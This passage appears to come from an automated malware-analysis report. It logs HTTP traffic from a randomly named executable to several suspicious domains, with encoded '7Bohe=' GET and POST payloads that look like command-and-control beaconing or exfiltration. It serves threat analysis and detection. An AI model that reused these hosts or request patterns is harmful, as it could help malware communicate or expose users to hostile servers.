                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+kr/pCDIihfjigoksvi+vJhWskiCfQzodsqhxbtIzWdnzyoKtO00TDz9COqoKkwKhP3yykIIVK3h4D6lhl3puBIRJKcIFcPaqQgt60VA+b1fYauOHBg3BWqPEhcI32y6a7w3PjmWbYcpu03sM2xEP38UGAaVs8XpTKaQUY6+dbr4cwJi4Jbbmm26DCUVpojdp5DNHVK+jQjksvHoJM51VQfBap9MYrkfie8HXySxoyNIT3nkczAH34OKGnbd+yNxyv+GpWNVPgizIw9j+kKYjgoW7dPfY7Pu7+8wrvb64hsIF75T+sR3HACJfVU/uYWjOzrucjf7pZbn1hZrlJQ6Am0cr6TXGpxfxoXrOhbgMmBubV9GylBwtbqQ3NW3PGERJh4Ogu+AecAOkGqh9eFEtBiCSDWmPgEQqa7Sn2EmjyixJviBS9+KMe07LVSLn1JJo9HlfiNpvbK+ayIErFN8RZhd9O5FT1hoVTSgmUc12eZmRMhq8SJ0rG4HcDt5DgzMUIZLfxOFrXbfYEiA0TZXr7t4N54o7uR/vT6fdWet+qPlrdb5mlCobt/czR1zKZI8BEcYyHG4eKfVXMrdE9Rq7RFsuXDwbbZzAPTIoLuDUx8yZGlrD6gEh4obF3KmNwW4vg2YAnPfp65VKEEBXU6DraaZLNm3OcU1gQ/adXDql8IL3rR7+b6p1da28yT+vZJYhjAX/OpbfFpSYZJZnKCXVkTo32Y+02YFR7jXHCSUhbpaOWU1eYcjhnhcwHBcOWMR+/cSeb4HLMwCEgKWhFvGpDO6A/z+SpN3yCuv/Q2YoQ4xeFSOnTZWlaLykdxRfXDSXyhnQSnsh7yqY/19adedonot3GEMNfnFm+zKR8ZRcSEoNdW08xhpfj3LstDawx/Fmb0poJryyIaBBLNb38Tc2grHU51KwrW3/jqGDVU5hNte+NpQ4x3j11PtL1lpYTQY7G1loJaBuzYt/Bxoj+Erx45XUzZ5GuzVMoGi [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:50.406546116 CEST206INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:50 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              52192.168.2.550034213.249.67.10802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.119189024 CEST489OUTGET /z0t0/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:52.976507902 CEST355INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:52 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              53192.168.2.55003567.223.117.169802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.155334949 CEST752OUTPOST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 7a 70 79 35 6d 55 44 30 4e 4d 2b 33 51 58 43 42 42 51 68 30 39 73 2f 41 6c 58 32 6c 73 43 76 6c 61 43 37 33 6f 38 33 63 73 6f 53 48 44 45 30 47 55 31 55 54 4f 4e 41 51 4a 69 66 79 39 4a 6b 75 66 34 44 54 69 4a 4c 57 73 72 7a 7a 37 39 43 70 59 55 7a 41 49 6a 67 52 52 70 65 34 35 6c 69 78 2f 62 72 4c 79 55 6f 58 4b 36 33 67 6d 2b 6a 62 5a 4c 52 53 54 6b 67 6c 4f 7a 30 39 55 6d 52 39 49 31 44 57 42 4f 58 52 59 76 6e 59 36 57 56 41 6c 37 63 68 70 55 61 59 63 52 2f 67 65 62 74 51 6d 65 31 76 32 4d 52 70 78 6f 6f 44 79 67 42 33 65 6f 51 44 63 72 59 64 73 67 6a 6a 76 51 7a 70 52 2f 64 69 69 67 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Gzpy5mUD0NM+3QXCBBQh09s/AlX2lsCvlaC73o83csoSHDE0GU1UTONAQJify9Jkuf4DTiJLWsrzz79CpYUzAIjgRRpe45lix/brLyUoXK63gm+jbZLRSTkglOz09UmR9I1DWBOXRYvnY6WVAl7chpUaYcR/gebtQme1v2MRpxooDygB3eoQDcrYdsgjjvQzpR/diig=
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.821808100 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:58 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              54192.168.2.55003667.223.117.169802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.708987951 CEST772OUTPOST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 7a 70 79 35 6d 55 44 30 4e 4d 2b 6c 41 6e 43 53 57 73 68 6c 64 73 34 50 46 58 32 76 4d 43 6a 6c 62 2b 37 33 70 35 6f 66 65 63 53 48 69 30 30 55 6d 64 55 53 4f 4e 41 49 35 69 65 74 4e 4a 7a 75 66 31 30 54 6a 31 4c 57 73 2f 7a 7a 37 74 43 70 6f 6f 77 43 59 6a 2b 49 42 70 63 6d 4a 6c 69 78 2f 62 72 4c 78 6f 53 58 4b 43 33 67 57 75 6a 61 39 2f 4f 4d 6a 6b 6a 69 4f 7a 30 35 55 6d 56 39 49 31 31 57 42 2f 43 52 62 58 6e 59 37 6d 56 44 78 76 66 6f 70 55 63 47 73 51 37 67 65 71 65 63 48 4f 66 76 77 64 54 70 43 6f 57 43 45 4e 72 74 38 67 34 51 38 48 67 4e 2f 6f 55 79 66 78 61 7a 79 76 74 38 31 33 4f 5a 51 31 39 46 35 71 70 42 6f 72 64 69 34 50 76 6f 67 62 75
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Gzpy5mUD0NM+lAnCSWshlds4PFX2vMCjlb+73p5ofecSHi00UmdUSONAI5ietNJzuf10Tj1LWs/zz7tCpoowCYj+IBpcmJlix/brLxoSXKC3gWuja9/OMjkjiOz05UmV9I11WB/CRbXnY7mVDxvfopUcGsQ7geqecHOfvwdTpCoWCENrt8g4Q8HgN/oUyfxazyvt813OZQ19F5qpBordi4Pvogbu
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:01.359957933 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:01 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              55192.168.2.55003767.223.117.169802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.269017935 CEST1789OUTPOST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 7a 70 79 35 6d 55 44 30 4e 4d 2b 6c 41 6e 43 53 57 73 68 6c 64 73 34 50 46 58 32 76 4d 43 6a 6c 62 2b 37 33 70 35 6f 66 65 6b 53 48 51 38 30 47 33 64 55 52 4f 4e 41 57 4a 69 62 74 4e 4a 79 75 66 74 34 54 6a 35 39 57 70 37 7a 31 5a 56 43 68 37 77 77 4c 59 6a 2b 56 52 70 5a 34 35 6c 7a 78 2f 4c 6e 4c 79 51 53 58 4b 43 33 67 55 47 6a 4d 5a 4c 4f 4f 6a 6b 67 6c 4f 7a 47 39 55 6d 74 39 4a 52 6c 57 41 4c 53 51 72 33 6e 5a 62 32 56 4d 69 48 66 6e 70 55 65 48 73 51 64 67 65 6d 42 63 48 53 35 76 77 42 74 70 43 51 57 44 51 41 6e 34 73 38 39 49 64 48 6a 4d 64 6f 4b 6e 37 78 42 79 55 54 64 35 30 6a 65 56 6a 63 57 49 4f 57 2b 50 4c 47 45 77 4a 7a 42 70 6d 71 51 77 51 66 6a 63 58 66 47 51 55 69 69 64 30 76 55 42 69 57 75 53 57 32 49 6e 73 51 7a 59 57 33 51 6d 50 73 41 6c 58 30 6a 49 2b 72 64 4d 4d 46 4d 36 4e 34 58 74 5a 5a 36 45 71 5a 2f 66 73 61 2b 2b 4d 62 69 43 44 34 4c 4d 73 45 6c 48 59 46 61 2b 74 31 5a 31 77 57 69 2f 4d 75 72 48 68 52 2f 45 47 38 51 6d 43 4e 5a 30 52 71 71 64 6a 4e 68 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Gzpy5mUD0NM+lAnCSWshlds4PFX2vMCjlb+73p5ofekSHQ80G3dURONAWJibtNJyuft4Tj59Wp7z1ZVCh7wwLYj+VRpZ45lzx/LnLyQSXKC3gUGjMZLOOjkglOzG9Umt9JRlWALSQr3nZb2VMiHfnpUeHsQdgemBcHS5vwBtpCQWDQAn4s89IdHjMdoKn7xByUTd50jeVjcWIOW+PLGEwJzBpmqQwQfjcXfGQUiid0vUBiWuSW2InsQzYW3QmPsAlX0jI+rdMMFM6N4XtZZ6EqZ/fsa++MbiCD4LMsElHYFa+t1Z1wWi/MurHhR/EG8QmCNZ0RqqdjNhgFaPgUTLsefCaVmVpBcds0kW9PO6PR9/EquD/LqxgKYos5AGbwnQE6pz7056upZxD0NNhYU2Wlv1xtznNV55dpl/FHhIIemJeY1HYW1RBjQYSOerhQG481tRAc9TQxw81oyGLACpffxhP4cEuoLZzpjkBx9SPpl+lL1N7KdI18e260vjThZxqbAlWQNPXX7xEynymlEL3OoEGC7AuSZoJtqIYlW9DqvogafD1ofC7sET21sWqmrwMyytBJG8jToanxg7+jnHlOE16FviaGnR2iEJTjMFyrcH4D3fvtwo5lcBH9OyFlokin5YKLPnXbbhX5Q7q0ejEXecDf/iLEzqCdsyWrkzLclKX4m/hp1lcVU7ZnGAcNTzpEbFrFmYBOgiLncddh1vSLiqGw8P8R9rAMeTbnrK/MvCTMI+ZkYx92i/fAD3bUn0XthEFPFFIRiUPZzXU/9DI4h3W7D/uzK2X9GGgnh4iKMYCmAM8EGUh3SQsvbomfhCxndacn760zb8OX1cT26l87tc3xioIyCmGMVIhCGWTscAEHr+h+zPiUG7wB0KrCJtPe7SNFP/ELMgYn/nWLQlwdTNmXNtKLCYveaf4KFrOQurMLYkTIDFpMIXkqDoA1NS46QhRceu1+tCucMOSNlxJw4vr33i1gYlPHTkgrB0eQE15q [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.309240103 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:04 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              56192.168.2.55003867.223.117.169802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:05.803985119 CEST486OUTGET /3x2e/?7Bohe=LxBS6Twi9uZYinzDVhZFrrwHDjbbsejF2aCFyI0NTfR3MRAzX3VYMflTVpKBnal2v445F0Z9ZuD89KJE1ZsSKujcQCdh/qxt+vHDLhQvad3slFytU7/EPl4Sr/TZznzmuw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:06.469444990 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:06 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              57192.168.2.550039129.226.56.20080
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:14.642524004 CEST482OUTGET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.dxfwrc2h.sbs
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:15.608798027 CEST306INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: Tengine
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:15 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              58192.168.2.550040162.0.215.3380
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:21.307502985 CEST767OUTPOST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
